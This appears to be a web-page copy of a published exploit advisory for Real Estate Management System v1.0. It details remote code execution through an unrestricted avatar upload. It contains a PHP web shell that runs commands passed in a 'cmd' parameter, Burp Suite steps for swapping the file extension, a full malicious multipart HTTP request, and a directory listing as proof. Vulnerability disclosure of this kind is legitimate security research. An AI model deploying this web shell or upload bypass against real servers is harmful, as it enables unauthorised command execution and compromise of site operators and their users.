扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 |
# Exploit Title: Real Estate Management System v1.0 - Remote Code Execution via File Upload # Date: 2/11/2024 # Exploit Author: Diyar Saadi # Vendor Homepage: https://codeastro.com # Version: V1.0 # Tested on: Windows 11 +XAMPP 8.0.30 + Burp Suite Professional v2023.12.1.3 ## Description ## This Vulnerability allow the attacker to execute command injection payloads and upload malicious file into web server . ----------------------------------------------------------------------------------------------------------------------- ## Simple RCE Payload : ## <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system_payload($_GET['cmd']); } ?> </pre> </body> </html> ----------------------------------------------------------------------------------------------------------------------- ## Steps to Reproduce ## 1- Open Burp Suite ( Community + Professional ) + Click on Proxy Tab Then Enable Intercept By Clicking at Intercept is off . 2- Open The Browser From Proxy Tab Then Open The Resgister Web Page : http://localhost:8080/realestate/register.php 3- Prepare Your RCE PHP Script Base From Notepad or Any Editor Then Save the RCE PHP Script Base as : avatar.php filename . 4- Change The Filename extension into avatar.png ,after save the RCE PHP Script . 5- Click Chose File From User Image Section Then Upload Your avatar.png file . 6- Click Register Then Back to Burp Suite Proxy Tab : 7- Modify File Extension Into Orginal File Extension that is : avatar.php in Example :Content-Disposition: form-data; name="uimage"; filename="avatar.png" Content-Type: image/png . 8- After Modify The Content-Disposition From Burp Suite Proxy Tab Into Orginal File Extension Click Forward Button . 9- Open The Login Page : http://localhost:8080/realestate/login.php Then Register Through Your Account Email & Password . 10 - From MenuBar Click My Account & Profile Then Right Click at Image Icon > Copy Link > New Tab > Paste > Your Malicious Command is Ready To Execute .! ----------------------------------------------------------------------------------------------------------------------- ## Burp Request : ## POST /realestate/register.php HTTP/1.1 Host: localhost Content-Length: 1100 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywA99kZOAu8APGlhv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/realestate/register.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close ------WebKitFormBoundarypgW90eleiRxRzcEK Content-Disposition: form-data; name="name" johnhamosh ------WebKitFormBoundarypgW90eleiRxRzcEK Content-Disposition: form-data; name="email" rasu1l@in.com ------WebKitFormBoundarypgW90eleiRxRzcEK Content-Disposition: form-data; name="phone" +199988764 ------WebKitFormBoundarypgW90eleiRxRzcEK Content-Disposition: form-data; name="pass" <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> ------WebKitFormBoundarypgW90eleiRxRzcEK Content-Disposition: form-data; name="utype" user ------WebKitFormBoundarypgW90eleiRxRzcEK Content-Disposition: form-data; name="uimage"; filename="avatar.php" Content-Type: image/png <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> ------WebKitFormBoundarypgW90eleiRxRzcEK Content-Disposition: form-data; name="reg" Register ------WebKitFormBoundarypgW90eleiRxRzcEK-- ----------------------------------------------------------------------------------------------------------------------- ## PoC Simple RCE Through This Vulnerability :## Directory of C:\xampp\htdocs\realestate\admin\user .. 02/11/202408:09 PM 315 avatar.php 02/11/202408:04 PM 315 avatar.png 02/11/202406:54 PM 9,376 avatarm2-min.jpg 02/11/202406:54 PM13,186 avatarm7-min.jpg 02/11/202407:47 PM 1,814 avatars.php 02/11/202406:54 PM 1,313 gr7.png 02/11/202407:36 PM28 poc.php ----------------------------------------------------------------------------------------------------------------------- ## Video PoC : ## 1- https://github.com/vulnerablecms/RCE-RealEstateVIDEOPOC/blob/main/PoC-RCE.mp4 2- https://gofile.io/d/AEWEgI ----------------------------------------------------------------------------------------------------------------------- Greetz ! |
体验盒子
